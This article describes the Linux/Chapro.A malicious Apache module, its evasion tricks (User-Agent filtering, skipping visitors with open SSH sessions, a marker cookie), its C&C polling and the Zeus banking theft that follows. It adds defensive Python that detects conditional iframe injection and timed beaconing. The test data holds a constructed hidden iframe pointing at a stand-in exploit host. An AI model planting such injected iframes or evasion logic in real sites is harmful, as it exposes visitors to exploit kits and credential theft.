The malware, discovered by ESET and named Linux/Chapro.A, is a malicious module loaded into the Apache web server, software that serves more than half of the internet's websites. The sample analyzed by ESET injects an iframe into the pages the site serves to visitors, although ESET notes it could just as easily inject malicious JavaScript or some other payload. The iframe in this case redirects the visitor's browser to the Sweet Orange exploit pack, hosted on a separate server in Lithuania. Sweet Orange attempts to exploit one of four vulnerabilities in widely installed browser software: two in Java, one in Internet Explorer and one in Adobe Reader.
Chapro goes to some lengths to avoid discovery. First it inspects the visiting browser's User-Agent and ignores clients that are unlikely to be vulnerable to the exploit kit, such as crawlers and non-browser tools. It also withholds the injection from any visitor whose IP address currently has an SSH session open to the server, on the assumption that such a visitor is an administrator, and it sets its own cookie in the browser so that a repeat visitor is not served the iframe a second time. All of these features are intended to stop administrators from noticing the malware and to stop researchers from tracing an infection back to the compromised server: the purpose is to keep the malware conduit alive.
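Because the injection is conditional on who is asking, a single fetch from an administrator's workstation proves nothing. The practical check is to request the same page under several client profiles (a victim-like browser with a fresh cookie jar, the same browser carrying the site's cookies, a non-browser User-Agent) from a host with no SSH session open to the server, and diff the off-site iframes each profile receives. The following is an added example, not ESET's code or anything from the Chapro sample; the responses, hostnames and profile names are constructed inline so it runs offline, and in real use each entry in the dictionary would be the body of a live HTTP fetch made with that profile.

```python
"""Detect conditional iframe injection by diffing the page as seen by
several client profiles. Added example; all data below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collects the src attribute of every iframe/frame element."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def offsite_iframes(html, site_host):
    """Return iframe sources that point at a host other than the site itself.
    Relative URLs (no host) are the site's own content and are skipped."""
    parser = IframeCollector()
    parser.feed(html)
    found = []
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host and host.lower() != site_host.lower():
            found.append(src)
    return found


def diff_profiles(responses, site_host):
    """responses maps profile name -> HTML body received for the same URL.
    Returns {iframe_src: [profiles that received it]} restricted to off-site
    iframes that only SOME profiles got: that selective delivery is the
    signature of Chapro-style injection (clean for admins and crawlers,
    poisoned for a likely-vulnerable first-time visitor)."""
    seen = {}
    for profile, html in responses.items():
        for src in offsite_iframes(html, site_host):
            seen.setdefault(src, []).append(profile)
    return {src: profs for src, profs in seen.items() if len(profs) < len(responses)}


# Constructed sample: the site's own page, and the same page with a hidden
# off-site iframe appended (hypothetical host exploit.example.net).
SITE_HOST = "www.example.com"
CLEAN = ("<html><body><h1>Welcome</h1>"
         "<iframe src='/ads/frame.html'></iframe></body></html>")
INJECTED = CLEAN.replace(
    "</body>",
    "<iframe src='http://exploit.example.net/in.php' width='1' height='1' "
    "style='visibility:hidden'></iframe></body>")

# What each probe profile got back from the same URL (constructed).
SAMPLE_RESPONSES = {
    "ie8_fresh_cookie_jar": INJECTED,   # victim-like browser, no marker cookie
    "ie8_with_marker_cookie": CLEAN,    # same browser, already served once
    "curl_default_ua": CLEAN,           # non-browser User-Agent is ignored
    "admin_host_with_ssh_open": CLEAN,  # probe from an IP with an SSH session
}


def run_sample():
    return diff_profiles(SAMPLE_RESPONSES, SITE_HOST)


if __name__ == "__main__":
    for src, profiles in run_sample().items():
        print(f"conditional off-site iframe {src} served only to {profiles}")
```

Only the fresh-cookie, browser-like profile receives the off-site iframe, which is exactly the pattern an administrator checking from their own machine would never see. When probing a real server, vary the User-Agent and clear cookies between requests, and send the probes from a host that has no SSH session open to the server, since the module treats such visitors as administrators and keeps the page clean for them.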
So long as Chapro itself remains undiscovered, detection and takedown of the exploit site matters less to the attacker. Chapro contacts its C&C server every ten minutes and receives the iframe to be injected. If the exploit site is taken down, the C&C operator can simply deliver a new iframe redirecting visitors to a different exploit site.
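A fixed ten-minute check-in is also the module's weak point on the network side: a web server normally accepts connections but rarely initiates them on a clock. The following is an added example, not part of the original article or ESET's analysis, showing how to pick out metronomic outbound connections from a constructed connection log (timestamp, source, destination, destination port). The web server IP, the destinations and the timestamps are all made up for the example; the interval and jitter thresholds are assumptions to tune for your environment.

```python
"""Flag outbound beaconing from a web server by looking for destinations
contacted at near-constant intervals. Added example; log data constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection log for web server 203.0.113.10.
# 198.51.100.7:80 is hit every ~600 s with a few seconds of jitter;
# 198.51.100.20:443 is ordinary irregular traffic.
SAMPLE_LOG = """\
2012-12-18T10:00:02 203.0.113.10 198.51.100.7 80
2012-12-18T10:03:11 203.0.113.10 198.51.100.20 443
2012-12-18T10:10:03 203.0.113.10 198.51.100.7 80
2012-12-18T10:15:40 203.0.113.10 198.51.100.20 443
2012-12-18T10:20:01 203.0.113.10 198.51.100.7 80
2012-12-18T10:30:04 203.0.113.10 198.51.100.7 80
2012-12-18T10:40:02 203.0.113.10 198.51.100.7 80
2012-12-18T10:47:55 203.0.113.10 198.51.100.20 443
2012-12-18T10:50:03 203.0.113.10 198.51.100.7 80
"""


def parse_log(text, src_ip):
    """Group connection times (epoch seconds) by (dst, dport) for one source."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        if src != src_ip:
            continue
        events[(dst, int(dport))].append(datetime.fromisoformat(ts).timestamp())
    return events


def find_beacons(text, src_ip, min_hits=4, max_cv=0.05):
    """Return destinations the source contacts at a steady cadence.
    Periodicity is measured as the coefficient of variation of the gaps
    between consecutive connections; a C&C poll on a timer gives a tiny CV
    even with small jitter, while human-driven or load-driven traffic does not.
    min_hits and max_cv are assumed thresholds, not values from the page."""
    beacons = []
    for (dst, dport), times in parse_log(text, src_ip).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            beacons.append({
                "dst": dst,
                "dport": dport,
                "hits": len(times),
                "interval_s": round(avg, 1),
                "cv": round(cv, 4),
            })
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG, "203.0.113.10"):
        print(f"{b['dst']}:{b['dport']} contacted {b['hits']}x, "
              f"every ~{b['interval_s']} s (cv={b['cv']})")
```

On the constructed log only 198.51.100.7:80 survives the filter, at roughly 600 seconds between hits. Run against real flow or proxy logs, the same logic will also surface legitimate timers (package update checks, monitoring agents), so the output is a lead to confirm by identifying the process that owns the connection, not a verdict on its own.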
The Zeus variant ultimately delivered by this particular attack primarily targets Russian and European banks. In one example described by ESET, the bank's log-in page warning never to enter PIN or CVC/CVV codes is simply removed by the malware. “Once the user has logged into his account, the malware will inject a pop-up asking for the CVV code for his card, which is exactly the behavior outlined in the warning on the original login form,” reports ESET. The malware then tries to send the user's credentials, along with the CVV, to the botnet operator.
“The attack,” says Pierre-Marc Bureau, ESET security intelligence program manager, “shows the increased complexity of malware attacks. This complicated case spreads across three different countries, targeting users from a fourth one, making it very hard for law enforcement agencies to investigate and mitigate its effects.” Both the Chapro C&C server in Germany and the Sweet Orange exploit server in Lithuania are now offline.